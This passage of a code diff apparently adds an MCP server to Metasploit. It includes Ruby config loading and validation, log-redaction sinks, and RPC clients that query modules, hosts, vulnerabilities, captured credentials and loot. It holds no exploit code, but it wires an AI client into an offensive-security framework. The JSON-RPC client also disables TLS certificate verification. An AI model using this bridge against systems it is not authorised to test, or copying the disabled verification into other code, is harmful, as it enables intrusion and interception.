      # @return [Hash] Configuration hash with symbolized keys
      # @raise [ConfigurationError] If file not found or invalid YAML
      def self.load(file_path)
        unless File.exist?(file_path)
          raise ConfigurationError, "Configuration file not found: #{file_path}"
        end
        begin
          config = YAML.safe_load_file(file_path, symbolize_names: true)
        rescue Psych::SyntaxError => e
          raise ConfigurationError, "Invalid YAML syntax in #{file_path}: #{e.message}"
        end
        unless config.is_a?(Hash)
          raise ConfigurationError, "Configuration file must contain a YAML hash/dictionary"
        end
        apply_defaults(config)
        apply_env_overrides(config)
        config
      end

      # Load configuration from hash (for testing)
      #
      # NOTE(review): only a shallow dup of the input is taken, so nested
      # hashes in config_hash are mutated in place by the defaults/overrides
      # below — confirm callers do not rely on the input staying untouched.
      #
      # @param config_hash [Hash] Configuration hash
      # @return [Hash] Configuration hash with defaults and env overrides
      def self.load_from_hash(config_hash)
        config = config_hash.dup
        apply_defaults(config)
        apply_env_overrides(config)
        config
      end

      # Apply default values to configuration
      #
      # @param config [Hash] Configuration hash to modify in place
      def self.apply_defaults(config)
        config[:msf_api] ||= {}
        config[:mcp] ||= {}
        config[:rate_limit] ||= {}
        config[:logging] ||= {}
        config[:msf_api][:type] ||= 'messagepack'
        config[:msf_api][:host] ||= 'localhost'
        # Default port depends on the API flavor (JSON-RPC vs MessagePack).
        config[:msf_api][:port] ||= (config[:msf_api][:type] == 'json-rpc') ? 8081 : 55553
        config[:msf_api][:ssl] = config[:msf_api].fetch(:ssl, true)
        config[:msf_api][:auto_start_rpc] = config[:msf_api].fetch(:auto_start_rpc, true)
        config[:msf_api][:endpoint] ||= case config[:msf_api][:type]
                                        when 'json-rpc'
                                          Msf::MCP::Metasploit::JsonRpcClient::DEFAULT_ENDPOINT
                                        else
                                          Msf::MCP::Metasploit::MessagePackClient::DEFAULT_ENDPOINT
                                        end
        config[:mcp][:transport] ||= 'stdio'
        if config[:mcp][:transport] == 'http'
          config[:mcp][:host] ||= 'localhost'
          config[:mcp][:port] ||= 3000
        end
        config[:rate_limit][:enabled] = config[:rate_limit].fetch(:enabled, true)
        config[:rate_limit][:requests_per_minute] ||= 60
        config[:rate_limit][:burst_size] ||= 10
        config[:logging][:enabled] = config[:logging].fetch(:enabled, false)
        config[:logging][:level] ||= 'INFO'
        config[:logging][:log_file] ||= File.join(Msf::Config.log_directory, 'msfmcp.log')
        config[:logging][:sanitize] = config[:logging].fetch(:sanitize, true)
      end

      # Apply environment variable overrides
      #
      # @param config [Hash] Configuration hash to modify in place
      def self.apply_env_overrides(config)
        # Ensure nested hashes exist
        config[:msf_api] ||= {}
        config[:mcp] ||= {}
        # MSF API overrides
        config[:msf_api][:type] = ENV['MSF_API_TYPE'] if ENV['MSF_API_TYPE']
        config[:msf_api][:host] = ENV['MSF_API_HOST'] if ENV['MSF_API_HOST']
        config[:msf_api][:port] = ENV['MSF_API_PORT'].to_i if ENV['MSF_API_PORT']
        config[:msf_api][:ssl] = parse_boolean(ENV['MSF_API_SSL']) if ENV['MSF_API_SSL'] && !ENV['MSF_API_SSL'].empty?
        config[:msf_api][:endpoint] = ENV['MSF_API_ENDPOINT'] if ENV['MSF_API_ENDPOINT']
        config[:msf_api][:user] = ENV['MSF_API_USER'] if ENV['MSF_API_USER']
        config[:msf_api][:password] = ENV['MSF_API_PASSWORD'] if ENV['MSF_API_PASSWORD']
        config[:msf_api][:token] = ENV['MSF_API_TOKEN'] if ENV['MSF_API_TOKEN']
        config[:msf_api][:auto_start_rpc] = parse_boolean(ENV['MSF_AUTO_START_RPC']) if ENV['MSF_AUTO_START_RPC']
        # MCP transport override
        config[:mcp][:transport] = ENV['MSF_MCP_TRANSPORT'] if ENV['MSF_MCP_TRANSPORT']
        # MCP server network overrides
        config[:mcp][:host] = ENV['MSF_MCP_HOST'] if ENV['MSF_MCP_HOST']
        config[:mcp][:port] = ENV['MSF_MCP_PORT'].to_i if ENV['MSF_MCP_PORT']
      end

      # Parse a string value into a boolean
      #
      # @param value [String] String to parse ('true', '1', 'yes' → true; anything else → false)
      # @return [Boolean]
      def self.parse_boolean(value)
        %w[true 1 yes].include?(value.to_s.downcase)
      end

      # A bare `private` does not apply to `def self.` singleton methods in
      # Ruby, so the helper methods above were effectively public; make them
      # private explicitly, matching the original intent.
      private_class_method :apply_defaults, :apply_env_overrides, :parse_boolean
    end
  end
end
+202
View File
@@ -0,0 +1,202 @@
# frozen_string_literal: true
module Msf::MCP
  module Config
    # Validates an MCP configuration hash (as produced by Config::Loader),
    # collecting every problem found and raising a single ValidationError.
    class Validator
      VALID_API_TYPES = %w[messagepack json-rpc].freeze
      VALID_TRANSPORTS = %w[stdio http].freeze

      # Validate configuration hash (class method)
      #
      # @param config [Hash] Configuration hash to validate
      # @return [true] If validation passes
      # @raise [ValidationError] If validation fails
      def self.validate!(config)
        new.validate!(config)
      end

      # Validate configuration hash (instance method)
      #
      # @param config [Hash] Configuration hash to validate
      # @return [true] If validation passes
      # @raise [ValidationError] If validation fails
      def validate!(config)
        # Accumulates field => reason pairs; raised all at once at the end.
        errors = {}
        # Check msf_api section exists (fatal: nothing else can be checked)
        unless config[:msf_api].is_a?(Hash)
          errors[:msf_api] = "configuration section is required"
          raise ValidationError.new(errors)
        end
        # Validate API type
        if config[:msf_api][:type] && !VALID_API_TYPES.include?(config[:msf_api][:type])
          errors[:'msf_api.type'] = "must be one of the valid API types: #{VALID_API_TYPES.join(', ')}"
        end
        # Validate host
        if config[:msf_api][:host] && config[:msf_api][:host].to_s.strip.empty?
          errors[:'msf_api.host'] = "must be a non-empty string"
        end
        # Validate mcp section type
        if config.key?(:mcp) && !config[:mcp].is_a?(Hash)
          errors[:mcp] = "must be a configuration hash"
        end
        # Validate transport
        if config[:mcp].is_a?(Hash) && config[:mcp][:transport] && !VALID_TRANSPORTS.include?(config[:mcp][:transport])
          errors[:'mcp.transport'] = "must be one of the valid transport: #{VALID_TRANSPORTS.join(', ')}"
        end
        # Validate port
        if config[:msf_api][:port]
          port = config[:msf_api][:port].to_i
          unless port.between?(1, 65535)
            errors[:'msf_api.port'] = "must be between 1 and 65535"
          end
        end
        # Validate SSL option
        if config[:msf_api].key?(:ssl) && ![true, false].include?(config[:msf_api][:ssl])
          errors[:'msf_api.ssl'] = "must be boolean (true or false)"
        end
        # Validate auto_start_rpc option
        if config[:msf_api].key?(:auto_start_rpc) && ![true, false].include?(config[:msf_api][:auto_start_rpc])
          errors[:'msf_api.auto_start_rpc'] = "must be boolean (true or false)"
        end
        # Validate MCP port
        if config[:mcp].is_a?(Hash) && config[:mcp][:port]
          port = config[:mcp][:port].to_i
          unless port.between?(1, 65535)
            errors[:'mcp.port'] = "must be between 1 and 65535"
          end
        end
        # Validate conditional requirements based on API type
        if config[:msf_api][:type] == 'messagepack'
          validate_messagepack_auth(config, errors)
        elsif config[:msf_api][:type] == 'json-rpc'
          validate_jsonrpc_auth(config, errors)
        end
        # Validate rate_limit section
        if config.key?(:rate_limit)
          if config[:rate_limit].is_a?(Hash)
            validate_rate_limit(config, errors)
          else
            errors[:rate_limit] = "must be a configuration hash"
          end
        end
        # Validate logging section
        if config.key?(:logging)
          if config[:logging].is_a?(Hash)
            validate_logging(config, errors)
          else
            errors[:logging] = "must be a configuration hash"
          end
        end
        # Raise error if any validation failed
        unless errors.empty?
          raise ValidationError.new(errors)
        end
        true
      end

      private

      # Hosts for which the RPC manager can auto-generate credentials.
      LOCALHOST_HOSTS = %w[localhost 127.0.0.1 ::1].freeze

      # Validate MessagePack authentication fields
      #
      # Credentials are optional when auto-start can generate random ones
      # (auto_start_rpc enabled + localhost). If neither user nor password is
      # provided under those conditions, validation passes and the RPC manager
      # will generate random credentials at startup.
      def validate_messagepack_auth(config, errors)
        user_provided = config[:msf_api][:user] && !config[:msf_api][:user].to_s.strip.empty?
        password_provided = config[:msf_api][:password] && !config[:msf_api][:password].to_s.strip.empty?
        # Both provided — nothing to validate
        return if user_provided && password_provided
        # Neither provided and auto-start can generate them — OK
        return if !user_provided && !password_provided && credentials_can_be_generated?(config)
        # Otherwise, require both
        unless user_provided
          errors[:'msf_api.user'] = "is required for MessagePack authentication. Use --user option or MSF_API_USER environment variable"
        end
        unless password_provided
          errors[:'msf_api.password'] = "is required for MessagePack authentication. Use --password option or MSF_API_PASSWORD environment variable"
        end
      end

      # Whether the RPC manager can generate random credentials for this config.
      #
      # @param config [Hash] Configuration hash
      # @return [Boolean]
      def credentials_can_be_generated?(config)
        config[:msf_api][:auto_start_rpc] != false &&
          LOCALHOST_HOSTS.include?(config[:msf_api][:host].to_s.downcase)
      end

      # Validate JSON-RPC authentication fields
      def validate_jsonrpc_auth(config, errors)
        unless config[:msf_api][:token] && !config[:msf_api][:token].to_s.strip.empty?
          errors[:'msf_api.token'] = "is required for JSON-RPC authentication"
        end
      end

      # Validate rate_limit section fields
      def validate_rate_limit(config, errors)
        rate_limit = config[:rate_limit]
        if rate_limit.key?(:enabled) && ![true, false].include?(rate_limit[:enabled])
          errors[:'rate_limit.enabled'] = "must be boolean (true or false)"
        end
        if rate_limit.key?(:requests_per_minute)
          unless rate_limit[:requests_per_minute].is_a?(Integer) && rate_limit[:requests_per_minute] >= 1
            errors[:'rate_limit.requests_per_minute'] = "must be an integer >= 1"
          end
        end
        if rate_limit.key?(:burst_size)
          unless rate_limit[:burst_size].is_a?(Integer) && rate_limit[:burst_size] >= 1
            errors[:'rate_limit.burst_size'] = "must be an integer >= 1"
          end
        end
      end

      # Accepted (case-insensitive) values for logging.level.
      VALID_LOG_LEVELS = %w[DEBUG INFO WARN ERROR].freeze

      # Validate logging section fields
      def validate_logging(config, errors)
        logging = config[:logging]
        if logging.key?(:enabled) && ![true, false].include?(logging[:enabled])
          errors[:'logging.enabled'] = "must be boolean (true or false)"
        end
        if logging.key?(:level) && !VALID_LOG_LEVELS.include?(logging[:level].to_s.upcase)
          errors[:'logging.level'] = "must be one of: #{VALID_LOG_LEVELS.join(', ')}"
        end
        if logging.key?(:log_file) && logging[:log_file].to_s.strip.empty?
          errors[:'logging.log_file'] = "must be a non-empty string"
        end
        if logging.key?(:sanitize) && ![true, false].include?(logging[:sanitize])
          errors[:'logging.sanitize'] = "must be boolean (true or false)"
        end
      end
    end
  end
end
+69
View File
@@ -0,0 +1,69 @@
# frozen_string_literal: true

module Msf::MCP
  ##
  # Root of the Msf::MCP exception hierarchy; rescue this class to catch
  # any error raised by the MCP subsystem.
  #
  class Error < StandardError; end

  ##
  # Configuration Layer Errors
  #
  module Config
    # Raised for general configuration problems.
    class ConfigurationError < Error; end

    # Raised when one or more configuration fields fail validation.
    # Per-field failures are exposed via #errors.
    class ValidationError < Error
      # @return [Hash] field name => failure message pairs
      attr_reader :errors

      # @param errors [Hash] Validation failures keyed by field name
      def initialize(errors = {})
        @errors = errors
        super(build_message)
      end

      private

      # Compose a one-line summary when no field details exist, otherwise
      # a bulleted list of "field message" entries.
      def build_message
        if @errors.empty?
          "Configuration validation failed"
        else
          details = @errors.map { |field, error| "#{field} #{error}" }
          "Configuration validation failed:\n - #{details.join("\n - ")}"
        end
      end
    end
  end

  ##
  # Security Layer Errors
  #
  module Security
    # Raised when request input fails security validation.
    class ValidationError < Error; end

    # Raised when a client exceeds the configured rate limit.
    class RateLimitExceededError < Error
      # @return [Numeric] seconds the caller should wait before retrying
      attr_reader :retry_after

      # @param retry_after [Numeric] Seconds until the next request is allowed
      def initialize(retry_after)
        @retry_after = retry_after
        super("Rate limit exceeded. Retry after #{retry_after} seconds.")
      end
    end
  end

  ##
  # Metasploit Client Layer Errors
  #
  module Metasploit
    class AuthenticationError < Error; end
    class ConnectionError < Error; end
    class APIError < Error; end
    class RpcStartupError < Error; end
  end
end
@@ -0,0 +1,24 @@
# -*- coding: binary -*-

module Msf::MCP
  module Logging
    module Sinks
      ###
      #
      # LogSink implementation that persists JSON log entries to a flat
      # file on disk, delegating formatting to JsonStream.
      #
      ###
      class JsonFlatfile < Msf::MCP::Logging::Sinks::JsonStream
        # @param path [String] Path of the log file; opened in append mode
        #   so existing entries survive restarts.
        def initialize(path)
          super(File.new(path, 'a'))
        end
      end
    end
  end
end
@@ -0,0 +1,123 @@
# frozen_string_literal: true

module Msf::MCP
  module Logging
    module Sinks
      # A Rex LogSink that formats log messages as JSON and writes them to
      # an IO stream (e.g. $stdout, a File, a StringIO).
      #
      # @example Writing JSON logs to $stderr
      #   sink = Msf::MCP::Logging::Sinks::JsonStream.new($stderr)
      #   register_log_source('mcp', sink, Rex::Logging::LEV_0)
      #
      # @example Backed by a file via JsonFlatfile
      #   sink = Msf::MCP::Logging::Sinks::JsonFlatfile.new('msfmcp.log')
      #   register_log_source('mcp', sink, Rex::Logging::LEV_0)
      class JsonStream
        include Rex::Logging::LogSink

        # @param stream [IO] Destination stream; must respond to #write and #flush
        def initialize(stream)
          @stream = stream
        end

        # Write one newline-delimited JSON log entry to the stream.
        #
        # When +msg+ is a Hash, its :message, :context and :exception keys are
        # lifted into the entry; :context is summarized (heavy keys truncated)
        # unless the MCP source is logging at DEBUG level or above.
        #
        # @param sev [Object] Severity tag (upcased into the entry)
        # @param src [Object] Log source name
        # @param level [Object] Numeric log level
        # @param msg [Hash, #to_s] Structured payload or plain message
        def log(sev, src, level, msg)
          log_entry = {
            timestamp: get_current_timestamp,
            severity: sev.to_s.upcase,
            level: level.to_s,
            source: src.to_s,
            message: msg.to_s
          }
          if msg.is_a?(Hash)
            log_entry[:message] = msg[:message] if msg[:message] && !msg[:message].empty?
            if msg[:context] && !msg[:context].empty?
              log_entry[:context] = debug_log_level? ? msg[:context] : summarize_context(msg[:context])
            end
            log_entry[:exception] = format_exception(msg[:exception]) if msg[:exception]
          end
          stream.write(log_entry.to_json + "\n")
          stream.flush
        end

        # Close the underlying stream.
        def cleanup
          stream.close
        end

        protected

        attr_accessor :stream

        private

        # Keys whose values can be large (full API responses, tool results, etc.)
        # and should be truncated at non-DEBUG log levels.
        HEAVY_KEYS = %i[result body error].freeze

        # Maximum character length for truncated values.
        TRUNCATE_MAX_LENGTH = 1000

        # Whether the current log level for the MCP source is at least DEBUG
        # (LEV_3 / BACKTRACE_LOG_LEVEL), which enables full context output
        # and exception backtraces.
        #
        # @return [Boolean]
        def debug_log_level?
          get_log_level(LOG_SOURCE) >= BACKTRACE_LOG_LEVEL
        end

        # Render an :exception payload value for the log entry.
        #
        # Exception objects become a { class:, message: } hash, with up to five
        # backtrace frames added at DEBUG level. Reuses #debug_log_level?
        # rather than duplicating the level comparison inline (the original
        # repeated `get_log_level(LOG_SOURCE) >= BACKTRACE_LOG_LEVEL` here).
        # Non-Exception values pass through unchanged.
        #
        # @param ex [Exception, Object] Raw :exception value from the payload
        # @return [Hash, Object]
        def format_exception(ex)
          return ex unless ex.is_a?(Exception)

          details = { class: ex.class.name, message: ex.message }
          details[:backtrace] = ex.backtrace&.first(5) || [] if debug_log_level?
          details
        end

        # Return a reduced copy of +ctx+ suitable for non-DEBUG log entries.
        #
        # Heavy keys (:result, :body, :error) are truncated. The :response sub-hash is also
        # truncated. All other keys (scalars like :method, :elapsed_ms, :session_id) pass
        # through unchanged.
        #
        # @param ctx [Hash] The original context hash
        # @return [Hash] A summarized copy
        def summarize_context(ctx)
          return ctx unless ctx.is_a?(Hash)

          ctx.each_with_object({}) do |(k, v), acc|
            if HEAVY_KEYS.include?(k)
              acc[k] = truncate_value(v)
            elsif k == :response && v.is_a?(Hash)
              acc[k] = v.each_with_object({}) do |(k_sub, v_sub), acc_sub|
                acc_sub[k_sub] = HEAVY_KEYS.include?(k_sub) ? truncate_value(v_sub) : v_sub
              end
            else
              acc[k] = v
            end
          end
        end

        # Truncate a value to a human-readable summary string.
        #
        # @param val [Object] The value to truncate
        # @param max_length [Integer] Maximum character length before truncation
        # @return [Object] The original value if short enough, otherwise a truncated string
        def truncate_value(val, max_length: TRUNCATE_MAX_LENGTH)
          str = val.is_a?(String) ? val : val.to_json
          return val if str.length <= max_length

          "#{str[0...max_length]}... (truncated, #{str.length} bytes)"
        end
      end
    end
  end
end
@@ -0,0 +1,111 @@
# frozen_string_literal: true

require 'rex/logging/log_sink'

module Msf::MCP
  module Logging
    module Sinks
      # A Rex LogSink decorator that redacts sensitive information from log
      # messages before delegating to a wrapped sink.
      #
      # Redaction happens in two layers: hash keys matching SENSITIVE_KEYS are
      # replaced wholesale, and free-form strings are scrubbed against
      # SENSITIVE_PATTERNS.
      #
      # @example Wrapping a JsonFlatfile sink
      #   inner = Msf::MCP::Logging::Sinks::JsonFlatfile.new('msfmcp.log')
      #   sink = Msf::MCP::Logging::Sinks::Sanitizing.new(inner)
      #   register_log_source('mcp', sink, Rex::Logging::LEV_0)
      class Sanitizing
        include Rex::Logging::LogSink

        # Replacement text used wherever a sensitive value is removed.
        REDACTED = '[REDACTED]'

        # Patterns for sensitive values embedded in free-form strings, both
        # key/value style (password=..., "token": "...") and header style
        # (bearer abc123). Each match is post-processed in #sanitize_string
        # so only the value part is replaced where possible.
        SENSITIVE_PATTERNS = {
          password: /password[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
          token_keyval: /token[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
          token_header: /token\s+[a-zA-Z0-9_\-\.]+/i,
          api_key: /api[_-]?key[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
          secret: /secret[_-]?key[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
          credential: /credential[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
          auth: /auth[\"']?\s*[:=]\s*[\"']?[^\"',\s}]+/i,
          bearer: /bearer\s+[a-zA-Z0-9_\-\.]+/i
        }.freeze

        # Hash keys whose entire value is redacted (unless it is a container,
        # which is recursed into instead — see #sanitize).
        SENSITIVE_KEYS = /\A(password|token|secret|api_key|api_secret|credential|auth_token|bearer|access_token|private_key)\z/i

        # @param sink [Rex::Logging::LogSink] The underlying sink to write to
        def initialize(sink)
          @sink = sink
        end

        # Sanitize the message, then delegate to the wrapped sink unchanged.
        def log(sev, src, level, msg)
          @sink.log(sev, src, level, sanitize(msg))
        end

        # Delegate cleanup to the wrapped sink.
        def cleanup
          @sink.cleanup
        end

        private

        # Sanitize data for logging by redacting sensitive information.
        #
        # @param data [Object] Data to sanitize (Hash, Array, String, or other)
        # @return [Object] Sanitized copy of data
        def sanitize(data)
          case data
          when Hash
            data.each_with_object({}) do |(k, v), result|
              # Note: `||` binds tighter than `?:`, so this reads
              # (Hash || Array) ? recurse : redact — containers under a
              # sensitive key are recursed into, scalars are redacted outright.
              result[k] = if k.to_s.match?(SENSITIVE_KEYS)
                v.is_a?(Hash) || v.is_a?(Array) ? sanitize(v) : REDACTED
              elsif k.to_sym == :exception && v.is_a?(Exception)
                # Exceptions are flattened to class/message (both sanitized);
                # backtraces are included only at DEBUG level and above.
                ex_msg = { class: v.class.name, message: sanitize(v.message) }
                if get_log_level(LOG_SOURCE) >= BACKTRACE_LOG_LEVEL
                  bt = v.backtrace&.first(5) || []
                  bt = bt.map{|x| x.sub(/^.*lib\//, 'lib/') } # Don't expose the install path
                  ex_msg[:backtrace] = sanitize(bt)
                end
                ex_msg
              else
                sanitize(v)
              end
            end
          when Array
            data.map { |item| sanitize(item) }
          when String
            sanitize_string(data)
          else
            # Numbers, symbols, booleans, nil, etc. pass through untouched.
            data
          end
        end

        # Sanitize a string by redacting sensitive patterns
        #
        # @param str [String] String to sanitize
        # @return [String] Sanitized string
        def sanitize_string(str)
          return str unless str.is_a?(String)
          sanitized = str.dup
          # Redact sensitive patterns - match entire pattern and replace value part
          SENSITIVE_PATTERNS.each do |name, pattern|
            sanitized = sanitized.gsub(pattern) do |match|
              # For header-style tokens (token abc123, bearer abc123), replace the value
              # NOTE(review): assumes a single whitespace-separated value after
              # the scheme word — confirm against real Authorization headers.
              if name == :token_header || name == :bearer
                parts = match.split(/\s+/, 2)
                "#{parts[0]} #{REDACTED}"
              # For key-value style (token: abc123, password=abc123), replace after separator
              # (greedy .* keeps everything up to the LAST : or = in the match).
              elsif match =~ /(.*[:=])\s*[\"']?/
                "#{Regexp.last_match[1]} #{REDACTED}"
              else
                REDACTED
              end
            end
          end
          sanitized
        end
      end
    end
  end
end
+64
View File
@@ -0,0 +1,64 @@
# frozen_string_literal: true

require 'forwardable'

module Msf::MCP
  module Metasploit
    # Facade over the concrete RPC protocol implementations.
    # Routes every API call to either the MessagePack RPC client
    # (Metasploit's native protocol) or the JSON-RPC client.
    class Client
      extend Forwardable

      # All public API methods are forwarded verbatim to the protocol client.
      def_delegators :@client, :authenticate, :search_modules, :module_info, :db_hosts, :db_services, :db_vulns, :db_notes, :db_creds, :db_loot, :shutdown

      ##
      # Initialize Metasploit client with explicit parameters
      #
      # @param api_type [String] API type: 'messagepack' or 'json-rpc'
      # @param host [String] Metasploit host
      # @param port [Integer] Metasploit port
      # @param endpoint [String] API endpoint path
      # @param token [String, nil] API token (for json-rpc)
      # @param ssl [Boolean] Use SSL (default: true)
      #
      def initialize(api_type:, host:, port:, endpoint: nil, token: nil, ssl: true)
        @client = create_client(api_type: api_type, host: host, port: port, endpoint: endpoint, token: token, ssl: ssl)
      end

      private

      # Instantiate the protocol client matching +api_type+.
      #
      # The concrete class is required lazily so only the selected protocol's
      # implementation is loaded.
      #
      # @param api_type [String] API type: 'messagepack' or 'json-rpc'
      # @param host [String] Metasploit host
      # @param port [Integer] Metasploit port
      # @param endpoint [String] API endpoint path (protocol default when nil)
      # @param token [String, nil] API token (for json-rpc)
      # @param ssl [Boolean] Use SSL (default: true)
      # @return [MessagePackClient, JsonRpcClient] Client instance
      # @raise [Error] If invalid API type specified
      def create_client(api_type:, host:, port:, endpoint: nil, token: nil, ssl: true)
        if api_type == 'messagepack'
          require_relative 'messagepack_client'
          MessagePackClient.new(
            host: host,
            port: port,
            endpoint: endpoint || MessagePackClient::DEFAULT_ENDPOINT,
            ssl: ssl
          )
        elsif api_type == 'json-rpc'
          require_relative 'jsonrpc_client'
          JsonRpcClient.new(
            host: host,
            port: port,
            endpoint: endpoint || JsonRpcClient::DEFAULT_ENDPOINT,
            ssl: ssl,
            token: token
          )
        else
          raise Error, "Invalid API type: #{api_type}"
        end
      end
    end
  end
end
@@ -0,0 +1,199 @@
# frozen_string_literal: true

require 'net/http'
require 'json'

module Msf::MCP
  module Metasploit
    # JSON-RPC 2.0 client for Metasploit Framework
    # Implements bearer token authentication for the Metasploit JSON-RPC API
    # Endpoint: /api/v1/json-rpc (default port 8081)
    # See: lib/msf/core/rpc/json/ in Metasploit Framework repository
    class JsonRpcClient
      DEFAULT_ENDPOINT = '/api/v1/json-rpc'

      # Initialize JSON-RPC client
      # @param host [String] Metasploit RPC host
      # @param port [Integer] Metasploit RPC port
      # @param endpoint [String] API endpoint path (default: DEFAULT_ENDPOINT)
      # @param token [String] Bearer authentication token
      # @param ssl [Boolean] Use SSL (default: true)
      def initialize(host:, port:, endpoint: DEFAULT_ENDPOINT, token:, ssl: true)
        @host = host
        @port = port
        @endpoint = endpoint
        @token = token
        @request_id = 0
        @http = nil
        @ssl = ssl
      end

      # No-op for JSON-RPC: authentication uses a pre-configured bearer token.
      # This method exists so that JsonRpcClient satisfies the same interface as
      # MessagePackClient, allowing the Client facade to delegate uniformly.
      #
      # @param _user [String] Ignored
      # @param _password [String] Ignored
      # @return [String] The existing token
      def authenticate(_user, _password)
        @token
      end

      # Call Metasploit API method using JSON-RPC 2.0 format
      # @param method [String] API method name
      # @param args [Array] Arguments to pass to the method (must be an array)
      # @return [Hash] API response
      # @raise [AuthenticationError] If token is invalid
      # @raise [APIError] If API returns error
      # @raise [ConnectionError] If connection fails
      # @raise [ArgumentError] If args is not an array
      def call_api(method, args = [])
        raise ArgumentError, "args must be an Array, got #{args.class}" unless args.is_a?(Array)

        @request_id += 1
        # Build JSON-RPC 2.0 request as a hash
        request_body = {
          jsonrpc: '2.0',
          method: method,
          params: args,
          id: @request_id
        }
        # Send HTTP request
        response = send_request(request_body)
        # Check for JSON-RPC error
        if response['error']
          error_msg = response['error']['message'] || 'Unknown error'
          raise APIError, error_msg
        end
        response['result']
      end

      # Search for Metasploit modules
      # @param query [String] Search query
      # @return [Array<Hash>] Module metadata
      def search_modules(query)
        call_api('module.search', [query])
      end

      # Get module information
      # @param type [String] Module type ('exploit', 'auxiliary', 'post', etc.)
      # @param name [String] Module name
      # @return [Hash] Module information
      def module_info(type, name)
        call_api('module.info', [type, name])
      end

      # Get hosts from database
      # @param options [Hash] Query options (workspace, limit, offset, etc.)
      # @return [Hash] Response with 'hosts' array
      def db_hosts(options = {})
        call_api('db.hosts', [options])
      end

      # Get services from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'services' array
      def db_services(options = {})
        call_api('db.services', [options])
      end

      # Get vulnerabilities from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'vulns' array
      def db_vulns(options = {})
        call_api('db.vulns', [options])
      end

      # Get notes from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'notes' array
      def db_notes(options = {})
        call_api('db.notes', [options])
      end

      # Get credentials from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'creds' array
      def db_creds(options = {})
        call_api('db.creds', [options])
      end

      # Get loot from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'loots' array
      def db_loot(options = {})
        call_api('db.loots', [options])
      end

      # Shutdown client
      def shutdown
        @http&.finish if @http&.started?
        @http = nil
      end

      private

      # Send HTTP POST request with JSON-RPC payload
      # @param request_body [Hash] JSON-RPC request body as a hash
      # @return [Hash] Parsed response
      # @raise [ConnectionError] If connection fails or the body is not JSON
      # @raise [AuthenticationError] If token is invalid
      def send_request(request_body)
        # Create HTTP client if needed
        unless @http
          @http = Net::HTTP.new(@host, @port)
          @http.use_ssl = @ssl
          @http.verify_mode = OpenSSL::SSL::VERIFY_NONE if @ssl
        end
        # Create POST request
        request = Net::HTTP::Post.new(@endpoint)
        request['Content-Type'] = 'application/json'
        request['Authorization'] = "Bearer #{@token}"
        request.body = request_body.to_json
        dlog({
          message: 'JSON-RPC request',
          context: { method: request.method, endpoint: @endpoint, body: request_body }
        }, LOG_SOURCE, LOG_DEBUG)
        # Send request and parse response
        begin
          response = @http.request(request)
          parsed = case response.code.to_i
                   when 200
                     JSON.parse(response.body)
                   when 401
                     raise AuthenticationError, 'Invalid authentication token'
                   when 500
                     error_data = JSON.parse(response.body) rescue { 'error' => { 'message' => 'Internal server error' } }
                     error_msg = error_data.dig('error', 'message') || 'Internal server error'
                     raise APIError, error_msg
                   else
                     raise ConnectionError, "HTTP #{response.code}: #{response.message}"
                   end
          dlog({
            message: 'JSON-RPC response',
            context: { status: response.code, body: parsed }
          }, LOG_SOURCE, LOG_DEBUG)
          parsed
        rescue JSON::ParserError => e
          # A 200 body that is not valid JSON means the endpoint is not speaking
          # JSON-RPC (wrong port/endpoint, proxy error page, etc.). Wrap it so
          # callers only ever see the documented Msf::MCP error classes instead
          # of a raw JSON::ParserError escaping this abstraction.
          raise ConnectionError, "Invalid JSON response from Metasploit RPC: #{e.message}"
        rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
          raise ConnectionError, "Cannot connect to Metasploit RPC: #{e.message}"
        rescue SocketError => e
          raise ConnectionError, "Network error: #{e.message}"
        rescue Timeout::Error => e
          raise ConnectionError, "Request timeout: #{e.message}"
        rescue EOFError => e
          raise ConnectionError, "Empty response from Metasploit RPC: #{e.message}"
        end
      end
    end
  end
end
@@ -0,0 +1,262 @@
# frozen_string_literal: true

require 'net/http'
require 'msgpack'

module Msf::MCP
  module Metasploit
    # MessagePack RPC client for Metasploit Framework
    # Implements authentication and API calls using MessagePack serialization
    class MessagePackClient
      DEFAULT_ENDPOINT = '/api/'

      # Initialize MessagePack client
      # @param host [String] Metasploit RPC host
      # @param port [Integer] Metasploit RPC port
      # @param endpoint [String] API endpoint path (default: DEFAULT_ENDPOINT)
      # @param ssl [Boolean] Use SSL (default: true)
      def initialize(host:, port:, endpoint: DEFAULT_ENDPOINT, ssl: true)
        @host = host
        @port = port
        @endpoint = endpoint
        @token = nil
        @http = nil
        @user = nil
        @password = nil
        @retry_count = 0
        @max_retries = 2
        @ssl = ssl
      end

      # Authenticate with Metasploit RPC
      # @param user [String] Username
      # @param password [String] Password
      # @return [String] The resulting token if authentication successful
      # @raise [AuthenticationError] If authentication fails
      def authenticate(user, password)
        # Store credentials for automatic re-authentication
        @user = user
        @password = password
        # Send authentication request directly (bypass retry logic)
        request_array = ['auth.login', user, password]
        response = send_request(request_array)
        # Real Metasploit API returns string keys
        if response['result'] == 'success' && response['token']
          @token = response['token']
        elsif response['error']
          raise AuthenticationError, response['error']
        else
          raise AuthenticationError, 'Authentication failed'
        end
      end

      # Call Metasploit RPC API method
      # @param method [String] API method name (e.g., 'module.search')
      # @param args [Array] Arguments to pass to the method (must be an array)
      # @return [Hash, Array] API response
      # @raise [AuthenticationError] If authentication fails
      # @raise [APIError] If API returns an error
      # @raise [ConnectionError] If connection fails
      # @raise [ArgumentError] If args is not an array
      def call_api(method, args = [])
        raise ArgumentError, "args must be an Array, got #{args.class}" unless args.is_a?(Array)

        begin
          raise AuthenticationError, 'Not authenticated' unless @token

          # Build request array: [method, token, *args]
          request_array = [method, @token, *args]
          # Send HTTP request
          send_request(request_array)
        rescue AuthenticationError => e
          # It is not possible to reauthenticate if we don't have credentials stored
          raise unless @user && @password
          # If reauthentication succeeded but the token is still invalid, we should not retry indefinitely
          raise unless @retry_count < @max_retries

          @retry_count += 1
          @token = nil
          begin
            # NOTE: quote placement fixed — previously rendered as
            # `module.search': ...` instead of `'module.search': ...`
            wlog({ message: "'#{method}': #{e.message}. Attempting to re-authenticate (#{@retry_count}/#{@max_retries})" },
